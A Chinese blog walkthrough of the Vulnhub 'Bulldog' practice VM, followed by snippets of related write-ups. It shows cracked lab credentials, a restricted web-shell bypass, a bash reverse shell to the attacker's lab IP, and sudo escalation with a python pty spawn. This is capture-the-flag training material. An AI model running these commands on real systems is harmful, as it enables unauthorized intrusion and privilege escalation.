Vulnhub 渗透练习(三)—— Bulldog

最新推荐文章于 2025-03-05 22:32:07 发布
原创 最新推荐文章于 2025-03-05 22:32:07 发布 · 460 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透学习 #vulnhub

文章介绍了在VirtuallBox中进行环境搭建,通过设置网络为仅主机模式和桥接模式进行靶机连接。执行端口扫描发现开启的23端口,并尝试通过telnet登录。通过目录扫描和源码分析获取到网站信息,利用webshell进行操作,并通过特定命令反弹shell。进一步,文章展示了提权过程,找到sudo密码并使用Python打开新终端以获得root权限。

环境搭建

下载链接

在 virtuallBox 中打开靶机。

virtuallBox 网络连接方式设置为仅主机。
vmware 设置桥接模式的网卡为 VirtualBox Host-Only Ethernet Adapter。
kail 网络适配设置为 NAT 和 桥接。
来自:https://blog.youkuaiyun.com/LYJ20010728/article/details/119395324?spm=1001.2014.3001.5501

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
如果还是有问题最简单的方法就是直接还原网络适配器的默认值。
在这里插入图片描述

信息收集

端口扫描:

开了个 23 端口,如果有账密,直接 telnet 登录。
在这里插入图片描述
目录扫描:
在这里插入图片描述
/admin 提醒要是员工的用户名和密码。
在这里插入图片描述
在 /dev 中有对网站的一些见解,比如这个网站是 Django 等等,有个 webshell 页面,不过要验证,估计有个 cookie 啥的,在源码中还有一串 hash,解密
在这里插入图片描述
用这个登 Django 管理页面看下。

nick@bulldogindustries.com bulldog
sarah@bulldogindustries.com 	bulldoglover

成功
在这里插入图片描述
webshell 可用。
在这里插入图片描述

getshell

虽然说只能运行六个命令,但是我们可以用 echo 绕过。

ifconfig
ls
echo
pwd
cat
rm

在这里插入图片描述
反弹 shell

echo 'bash -i >& /dev/tcp/192.168.56.102/9999 0>&1' | bash

在这里插入图片描述

在这里插入图片描述

提权

在/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp 中找到sudo的密码:SUPERultimatePASSWORDyouCANTget

疑似 root 密码
在这里插入图片描述
提示我们要在终端上,那用 python 打开一个新终端
在这里插入图片描述

成功 root

sudo python -c 'import pty;pty.spawn("/bin/bash")'
SUPERultimatePASSWORDyouCANTget

在这里插入图片描述

(Vulnhub练习)--Bulldog1渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-18 467
Bulldog1渗透实战 文章转载 靶机渗透测试实战()——Bulldog1渗透实战 Bulldog1渗透实战 扫描不到bulldog主机ip ​ 【1】从新启动bulldog,到开机页面选择第二个Ubuntu的高级选项。 ​ 【2】进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。 选择root一行回车,进入命令行模式。 vim /etc/network/interfaces ,修改网卡名称成步骤查询的结果,保存。 auto ens33 iface ens33 inet dhcp reb
(Vulnhub练习)--bulldog2渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-19 234
bulldog2渗透实战 此文章是参照大佬橘子女侠的文章写的 以下为我跟着他的文章整理的笔记 masscan --rate=10000 --ports 0-65535 192.168.100.154 whatweb 192.168.100.154 dirsearch -u http://192.168.100.154 根据扫描到的目录,没有发现什么可用的信息,继续探索; 查看前端代码,发现首页调用了四个js文件,我们可以分别进行访问; 我们查看页面的时候,发现页面上角有个注册功能
vulnhub渗透日记23:bulldog
ericalezl的博客
03-05 305
可以用echo `curl` 的方法绕过限制。点击web-shell提示登录后才能使用。把那堆复制到1.txt中提取。
vulnhub渗透系列之bulldog
来到了学渣的博客
01-20 1761
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结: 1. 对端口信息扫描、信息的收集 2. 用dirb扫出了许多关键目录 3. 仔细观察每一个细节,这个靶机主要在/dev目录处前端源码泄露了MD5密码信息 4. 登录了管理员账号后可以在/dev/shell页面利用命令注入漏洞 5. 搭建临时...
VulnHub渗透测试-Bulldog2
原味瓜子、的博客
09-30 420
文章目录渗透步骤一、主机发现、端口扫描二、Web扫描、漏洞发现、漏洞利用、GetShell四、权限提升,得到Flag五、种植后门、清理痕迹 渗透步骤 一、主机发现、端口扫描 //主机发现 root@kali:~# ifconfig root@kali:~# nmap -sn 192.168.56.1/24 //端口扫描,获取服务、系统版本信息 root@kali:~# nmap -sV -O 192.168.56.104 //目录扫描 root@kali:~# dirb http://192.168.
VulnHub靶机渗透】一:BullDog2
野原新之助
03-20 1284
在网上大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试,熟悉了整体步骤,希望之后的靶机能越来越多的自己独立完成(大佬NB!),现将详细过程做如下整理。 简介 ...
靶机渗透()——bulldog2
qq_45751902的博客
04-16 2810
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova 二、bulldog2靶机搭建 将刚刚下载完成的bulldog2.ova导入到VM VirtualBox,并且修改靶机的网络,注意红框,下面能用到 修改完打开就是这样的 、kali攻击机 打开vmware中的虚拟网络编辑器,将kali网络类型配置成桥接模式,桥接至(不要自动,找到靶机的页面名称) 四、攻击 1.在kali上查看ip ifconfig 发现ip地址为192.1
渗透测试实战3——bulldog2靶机入侵
浅浅的博客
04-25 1180
一、实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150、(192.168.247.151) 开始之前,需先登录bulldog2。账号:dirty,密码:pass,并使其获取IP 二、实验步骤 (一)主动信息收集 1、扫描存活主机 2、扫描开放端口(192.168.247.150和192.168.247.151开...
Vulnhub靶场渗透测试 bulldog-1 非预期CVE-2017-16995,CVE-2021-4034
qq_29060627的博客
07-01 504
靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/脏牛提权失败(在2016年公布的漏洞,ubuntu16.04 可能补上了 )Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
vulnhub-bulldog2靶机渗透
m0_62146983的博客
09-13 1527
发现返回成功,但是显示密码错误。根据上面的提示,根据提示,“Link+ CLI Tool” 可能是一个命令行界面的工具,用于管理用户与 Link+ 服务的交互或身份验证。,重启之后,虽然没显示,但实际上已经获取到了ip.后续主机发现就可以找到。从下面的代码中我们不难发现,注册的时候需要post方法,传入json格式的注册信息。因为当前版本的ubuntu使用的是naeplan工具管理,所以修改它的配置文件,修改网卡号就可以。点击放行后,就会显示响应包,这时候浏览器还没有收到响应包,我们修改响应包的内容。
渗透测试】靶机渗透Vulnhub-bulldog
一个偶尔更新,有点神经质的开发人员,专注于网络安全和人工智能应用领域。
06-01 4046
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.youkuaiyun.com/Eastmount/article/detai
靶机渗透测试实战(四)——Bulldog2渗透实战
橘子女侠
05-10 3208
目录 一. 实验环境 二. 实验流程 . 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)渗透测试 四. 实验总结 一. 实验环境 靶机:Bulldog2 IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息...
靶机渗透测试实战()——Bulldog1渗透实战
橘子女侠
05-09 3906
目录 一. 实验环境 二. 实验流程 . 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)Web渗透 四. 实验总结 一. 实验环境 靶机:IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息收集——端口扫描 ...
基于SSM与Vue架构的病人跟踪治疗信息管理系统设计与实现(含源码及文档)
12-22
基于SSM架构与Vue技术构建的病人治疗追踪管理系统,采用Java编程语言实现业务逻辑,并以MySQL数据库作为数据存储支持。该系统主要包含个用户角色:管理员、病人及普通访客。 管理员具备的功能模块包括:主界面、个人设置、病人档案管理、病例信息采集、预约安排、医生信息维护、核酸检测报告上传管理、行动轨迹记录管理、疾病分类配置、病人治疗进度跟踪、留言板处理以及系统参数管理。病人用户可操作:主界面、个人设置、病例信息查看、预约申请、医生查询、核酸检测报告上传、行动轨迹上报、个人治疗状态查询。访客端提供:首页浏览、医生信息展示、医疗资讯发布、留言反馈提交、个人中心、后台入口及在线咨询服务。 系统设计注重代码结构的清晰性与可维护性,强调功能实用性和界面简洁度,同时保持较强的扩展适应能力,便于后续功能升级与日常运维。 项目已通过实际运行测试,开发环境配置如下: - 编程语言:Java - 开发框架:Spring Boot - Java开发工具包:JDK 1.8 - 应用服务器:Tomcat 7 - 数据库系统:MySQL 5.7 - 数据库管理工具:Navicat 12 - 集成开发环境:Eclipse或IntelliJ IDEA - 项目构建工具:Maven 3.3.9。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
电力系统单机无穷大电力系统短路故障暂态稳定Simulink仿真(带说明文档)
最新发布
12-22
【电力系统】单机无穷大电力系统短路故障暂态稳定Simulink仿真(带说明文档)内容概要:本文档围绕“单机无穷大电力系统短路故障暂态稳定Simulink仿真”展开,提供了完整的仿真模型与说明文档,重点研究电力系统在发生短路故障后的暂态稳定性问题。通过Simulink搭建单机无穷大系统模型,模拟不同类型的短路故障(如相短路),分析系统在故障期间及切除后的动态响应,包括发电机转子角度、转速、电压和功率等关键参数的变化,进而评估系统的暂态稳定能力。该仿真有助于理解电力系统稳定性机理,掌握暂态过程分析方法。; 适合人群:电气工程及相关专业的本科生、研究生,以及从事电力系统分析、运行与控制工作的科研人员和工程师。; 使用场景及目标:①学习电力系统暂态稳定的基本概念与分析方法;②掌握利用Simulink进行电力系统建模与仿真的技能;③研究短路故障对系统稳定性的影响及提高稳定性的措施(如故障清除时间优化);④辅助课程设计、毕业设计或科研项目中的系统仿真验证。; 阅读建议:建议结合电力系统稳定性理论知识进行学习,先理解仿真模型各模块的功能与参数设置,再运行仿真并仔细分析输出结果,尝试改变故障类型或系统参数以观察其对稳定性的影响,从而深化对暂态稳定问题的理解。
这是一个基于Prisma和SQLite数据库构建的现代化轻量级且开箱即用的个人作品集展示平台后端服务系统_该项目核心功能包括用户认证授权作品数据模型管理文件上传存储以及提供标.zip
12-22
这是一个基于Prisma和SQLite数据库构建的现代化轻量级且开箱即用的个人作品集展示平台后端服务系统_该项目核心功能包括用户认证授权作品数据模型管理文件上传存储以及提供标.zip
基于PSO算法优化支持向量机参数的MATLAB仿真源码:SVM与PSO-SVM性能对比
12-22
本研究聚焦于运用MATLAB平台,将支持向量机(SVM)应用于数据预测任务,并引入粒子群优化(PSO)算法对模型的关键参数进行自动调优。该研究属于机器学习领域的典型实践,其核心在于利用SVM构建分类模型,同时借助PSO的全局搜索能力,高效确定SVM的最优超参数配置,从而显著增强模型的整体预测效能。 支持向量机作为一种经典的监督学习方法,其基本原理是通过在高维特征空间中构造一个具有最大间隔的决策边界,以实现对样本数据的分类或回归分析。该算法擅长处理小规模样本集、非线性关系以及高维度特征识别问题,其有效性源于通过核函数将原始数据映射至更高维的空间,使得原本复杂的分类问题变得线性可分。 粒子群优化算法是一种模拟鸟群社会行为的群体智能优化技术。在该算法框架下,每个潜在解被视作一个“粒子”,粒子群在解空间中协同搜索,通过不断迭代更新自身速度与位置,并参考个体历史最优解和群体全局最优解的信息,逐步逼近问题的最优解。在本应用中,PSO被专门用于搜寻SVM中影响模型性能的两个关键参数——正则化参数C与核函数参数γ的最优组合。 项目所提供的实现代码涵盖了从数据加载、预处理(如标准化处理)、基础SVM模型构建到PSO优化流程的完整步骤。优化过程会针对不同的核函数(例如线性核、多项式核及径向基函数核等)进行参数寻优,并系统评估优化前后模型性能的差异。性能对比通常基于准确率、精确率、召回率及F1分数等多项分类指标展开,从而定量验证PSO算法在提升SVM模型分类能力方面的实际效果。 本研究通过一个具体的MATLAB实现案例,旨在演示如何将全局优化算法与机器学习模型相结合,以解决模型参数选择这一关键问题。通过此实践,研究者不仅能够深入理解SVM的工作原理,还能掌握利用智能优化技术提升模型泛化性能的有效方法,这对于机器学习在实际问题中的应用具有重要的参考价值。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
jank_record_1766403318764055404.pb
12-22
jank_record_1766403318764055404.pb
分层模糊系统:梯度下降与递推最小二乘法联合辨识研究(Matlab代码实现)
12-22
分层模糊系统:梯度下降与递推最小二乘法联合辨识研究(Matlab代码实现)内容概要:本文围绕“分层模糊系统:梯度下降与递推最小二乘法联合辨识研究”展开,介绍了基于Matlab代码实现的分层模糊系统参数辨识方法。通过结合梯度下降法和递推最小二乘法,实现对系统结构和参数的高效联合辨识,提升模型精度与收敛速度。文中详细阐述了算法原理、实现步骤及仿真验证过程,展示了该方法在非线性系统建模与辨识中的有效性,适用于复杂动态系统的建模与控制研究。; 适合人群:具备一定Matlab编程基础和系统辨识理论背景的研究生、科研人员及自动化、控制工程等相关领域的技术人员。; 使用场景及目标:①应用于非线性动态系统的建模与参数辨识;②用于提高模糊系统训练效率与预测精度;③支持科研复现、算法优化及工程实际中的系统辨识任务; 阅读建议:建议读者结合提供的Matlab代码进行实践操作,深入理解两种优化算法的融合机制,并尝试在不同数据集或应用场景中进行迁移与改进,以掌握其核心思想与实现技巧。
vulnhub-bulldog2靶机渗透扫描不出靶机ip
04-03
### 关于VulnHub Bulldog2靶机无法扫描到IP的解决方案 在渗透测试过程中,如果遇到无法通过常规手段扫描到目标主机的情况,可以尝试多种技术组合来定位目标主机。以下是针对此问题的具体分析和建议: #### 使用ARP扫描工具 当标准的`ping`或`nmap`扫描未能发现目标主机时,可以通过局域网内的ARP广播请求找到活动设备。例如,在引用中提到的方法3使用了`netdiscover`命令[^3]: ```bash netdiscover -r 192.168.44.0/24 -i eth0 ``` 上述命令会向指定子网发送ARP请求并监听响应,从而识别出网络中的活跃主机。 #### 调整Nmap参数优化扫描效果 除了传统的ICMP Ping外,还可以利用TCP SYN包或其他协议类型的探测方式提高成功率。比如下面这条指令包含了服务版本检测(-sV),隐秘模式(SYN半开扫描-sS)以及调整时间模板至更快执行速度(T4)[^2]: ```bash nmap -sS -sV -T4 192.168.11.19 ``` 另外值得注意的是,有时防火墙可能阻止来自外部源地址的数据包进入内部网络;因此有必要确认Kali Linux所在环境与Bulldog2 VM之间确实处于同一物理或者逻辑二层交换结构下(即两者能够互相访问对方MAC层面的信息). #### 测试Telnet/TCP连接验证特定端口状态 即使整体Ping不通某个节点,但如果已知其开放的服务端口号,则可以直接发起相应层次上的握手过程来进行判断是否存在可交互对象。正如材料里所描述那样,“尝试远程连接23端口后失败。”这表明虽然telnet未成功建立session,但仍不失为一种排查思路之一[^1]. 综上所述,对于找不到vulnhub bulldog2 IP这一难题,可以从多个角度出发寻找突破口:一方面借助专门设计用于本地网段探索的应用程序如NetDiscover;另一方面灵活运用高级配置选项丰富的侦查利器-NMAP,并辅以其他辅助性操作进一步缩小范围直至最终锁定确切位置。 ```python import os def scan_network(): command = 'netdiscover -r 192.168.44.0/24 -i eth0' result = os.popen(command).read() print(result) scan_network() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值